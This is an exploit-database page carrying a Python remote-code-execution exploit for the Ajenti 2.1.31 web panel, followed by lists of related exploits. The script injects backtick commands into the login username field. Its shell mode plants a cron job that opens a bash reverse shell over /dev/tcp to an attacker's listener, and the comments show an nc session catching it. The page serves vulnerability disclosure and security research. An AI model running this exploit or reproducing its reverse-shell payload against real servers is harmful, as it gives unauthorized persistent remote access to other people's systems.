Search for hundreds of thousands of exploits

"Ajenti 2.1.31 - Remote Code Execution"

Author

Exploit author

"Jeremy Brown"

Platform

Exploit platform

python

Release date

Exploit published date

2019-10-14

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
# Title: Ajenti 2.1.31 - Remote Code Execution
# Author: Jeremy Brown
# Date: 2019-10-13
# Software Link: https://github.com/ajenti/ajenti
# CVE: N/A
# Tested on: Ubuntu Linux

#!/usr/bin/python
# ajentix.py
# 
# Ajenti Remote Command Execution Exploit
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS. 
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So, we cron job.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
#   PID TTY          TIME CMD
#  6386 ?        00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ?        00:00:00 sh
# 18851 ?        00:00:00 bash
# 18859 ?        00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
# 
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#

import os
import sys
import ssl
import json
import urllib.request as request

def main():
	if(len(sys.argv) < 2):
		print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
		print("Eg:    %s 1.2.3.4 \"id\"" % sys.argv[0])
		print("...    %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
		return

	host = sys.argv[1]
	cmd = sys.argv[2]
	
	if(cmd == 'shell'):
		if(len(sys.argv) < 4):
			print("Error: need ip to connect back to for shell")
			return
		
		ip = sys.argv[3]

		shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
		username = shell
	
	else:
		username = "`" + cmd + "`"
		
	body = json.dumps({'username':username, 'password':'test', 'mode':'normal'})
	byte = body.encode('utf-8')
		
	url = "https://" + host + ":8000" + "/api/core/auth"
		
	try:
		req = request.Request(url)
		
		req.add_header('Content-Type', 'application/json; charset=utf-8')
		req.add_header('Content-Length', len(byte))
		
		request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert
			
	except Exception as error:
		print("Error: %s" % error)
		return
		
	print("Done!")


if(__name__ == '__main__'):
	main()
Release DateTitleTypePlatformAuthor
2020-08-04"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)"webappspython"Luis Vacacas"
2019-12-24"Django < 3.0 < 2.2 < 1.11 - Account Hijack"webappspython"Ryuji Tsutsui"
2019-10-14"Ajenti 2.1.31 - Remote Code Execution"webappspython"Jeremy Brown"
2019-09-30"TheSystem 1.0 - Command Injection"webappspython"Sadik Cetin"
2019-09-30"thesystem 1.0 - Cross-Site Scripting"webappspython"Anıl Baran Yelken"
2019-04-03"PhreeBooks ERP 5.2.3 - Remote Command Execution"remotepython"Metin Yunus Kandemir"
2019-02-15"Jinja2 2.10 - 'from_string' Server Side Template Injection"webappspythonJameelNabbo
2019-01-07"Mailcleaner - Authenticated Remote Code Execution (Metasploit)"remotepython"Mehmet Ince"
2017-10-18"Check_MK 1.2.8p25 - Information Disclosure"webappspython"Julien Ahrens"
2017-09-11"Docker Daemon - Unprotected TCP Socket (Metasploit)"remotepythonMetasploit
Release DateTitleTypePlatformAuthor
2019-10-15"Podman & Varlink 1.5.1 - Remote Code Execution"remotelinux"Jeremy Brown"
2019-10-14"Ajenti 2.1.31 - Remote Code Execution"webappspython"Jeremy Brown"
2016-12-06"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)"doswindows"Jeremy Brown"
2016-12-04"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution"remotehardware"Jeremy Brown"
2015-06-10"Libmimedir - '.VCF' Memory Corruption (PoC)"doslinux"Jeremy Brown"
2015-06-03"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token"webappshardware"Jeremy Brown"
2015-06-03"Seagate Central 2014.0410.0026-F - Remote Command Execution"remotehardware"Jeremy Brown"
2015-05-20"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation"localwindows"Jeremy Brown"
2015-01-28"ClearSCADA - Remote Authentication Bypass"remotewindows"Jeremy Brown"
2011-06-07"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM"remotewindows"Jeremy Brown"
2011-03-23"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities"doswindows"Jeremy Brown"
2011-03-23"Progea Movicon 11 - 'TCPUploadServer' Remote File System"remotewindows"Jeremy Brown"
2011-01-25"Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)"doswindows"Jeremy Brown"
2011-01-14"Objectivity/DB - Lack of Authentication"doswindows"Jeremy Brown"
2010-12-18"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)"doswindows"Jeremy Brown"
2010-09-16"BACnet OPC Client - Local Buffer Overflow (1)"localwindows"Jeremy Brown"
2009-12-12"Mozilla Codesighs - Memory Corruption"locallinux"Jeremy Brown"
2009-12-07"Polipo 1.0.4 - Remote Memory Corruption (PoC)"doslinux"Jeremy Brown"
2009-12-07"gAlan 0.2.1 - Local Buffer Overflow (1)"localwindows"Jeremy Brown"
2009-11-16"Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)"doswindows_x86"Jeremy Brown"
2009-10-28"Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation"localwindows"Jeremy Brown"
2009-10-06"Geany .18 - Local File Overwrite"locallinux"Jeremy Brown"
2009-09-24"Sun Solaris 10 RPC dmispd - Denial of Service"dossolaris"Jeremy Brown"
2009-09-09"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)"doswindows"Jeremy Brown"
2009-09-09"Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service"doswindows_x86"Jeremy Brown"
2009-09-09"GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow"locallinux"Jeremy Brown"
2009-07-21"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation"localwindows"Jeremy Brown"
2009-05-07"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow"localwindows"Jeremy Brown"
2009-03-12"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow"remotewindows"Jeremy Brown"
2009-02-27"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)"remotewindows"Jeremy Brown"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47497/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.